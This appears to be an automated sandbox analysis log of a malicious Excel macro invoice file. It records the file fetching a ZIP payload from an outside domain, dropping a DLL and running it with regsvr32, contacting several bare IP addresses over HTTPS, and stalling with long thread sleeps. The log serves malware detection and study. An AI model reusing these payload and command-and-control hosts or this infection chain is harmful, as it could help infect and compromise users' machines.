Source: global traffic | HTTP traffic detected:
GET /k04qkvqu.zip HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: wexfashion.com
Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown | TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88DFF5C3.emf
Source: global traffic | HTTP traffic detected:
GET /k04qkvqu.zip HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: wexfashion.com
Connection: Keep-Alive
Source: regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com6 equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: wexfashion.com
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.6.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226464574.0000000002A20000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0T#
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabK&
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabco
Source: DWWIN.EXE, 00000006.00000002.2225516913.0000000000122000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enuy#
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226486787.0000000002A31000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226486787.0000000002A31000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2376776287.00000000023B0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230525771.0000000003D10000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2374448037.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2374547806.00000000008C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226127205.0000000002410000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2376776287.00000000023B0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230525771.0000000003D10000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226464574.0000000002A20000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmpString found in binary or memory: http://www.pub.
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/2
Source: regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/5
Source: regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/xw1
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://80.86.91.27:3308/
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://80.86.91.27:3308/H
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://80.86.91.27:3308/rt
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Windows\System32\DWWIN.EXE | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulas
Source: INV8073565781-20210111319595.xlsm | Initial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\cjrumqtd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zip
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001CB780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001CBA14 NtSetInformationProcess,
Source: INV8073565781-20210111319595.xlsm | OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation | OLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: INV8073565781-20210111319595.xlsm | OLE indicator, VBA macros: true
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016
Source: k04qkvqu[1].zip.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.expl.evad.winXLSM@9/21@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$INV8073565781-20210111319595.xlsm
Source: C:\Windows\System32\DWWIN.EXE | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2300
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC7A2.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\DWWIN.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: INV8073565781-20210111319595.xlsm | Virustotal: Detection: 44%
Source: INV8073565781-20210111319595.xlsm | ReversingLabs: Detection: 32%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016
Source: unknown | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1016
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1016
Source: C:\Windows\System32\DWWIN.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: INV8073565781-20210111319595.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: INV8073565781-20210111319595.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: INV8073565781-20210111319595.xlsm | Initial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: k04qkvqu[1].zip.0.dr | Static PE information: section name: .rdata3
Source: k04qkvqu[1].zip.0.dr | Static PE information: section name: .2
Source: k04qkvqu[1].zip.0.dr | Static PE information: section name: .rdata2
Source: k04qkvqu[1].zip.0.dr | Static PE information: section name: .text4
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000400A push esi; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10010810 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000D856 push ebp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000C265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10020A73 push edx; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000FEBF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000E8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000FEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10023EFF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000C304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10010307 push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000CF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1001DB23 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10020B27 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10002140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1001CD9B push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000DFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10023FEB push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_100107FB pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001CBFB0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00197172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001B62CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001AF6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0019899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001989CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001BFB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00191D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_00190E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\cjrumqtd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zip
Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001A88DD rdtsc
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zip
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2856 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -760000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -918000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -825000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -393000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -372000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -142000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -266000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -432000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -620000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -870000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -254000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -306000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -1424000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -507000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -516000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -355000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -716000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -632000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -678000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -531000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -572000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3000 | Thread sleep time: -512000s >= -30000s
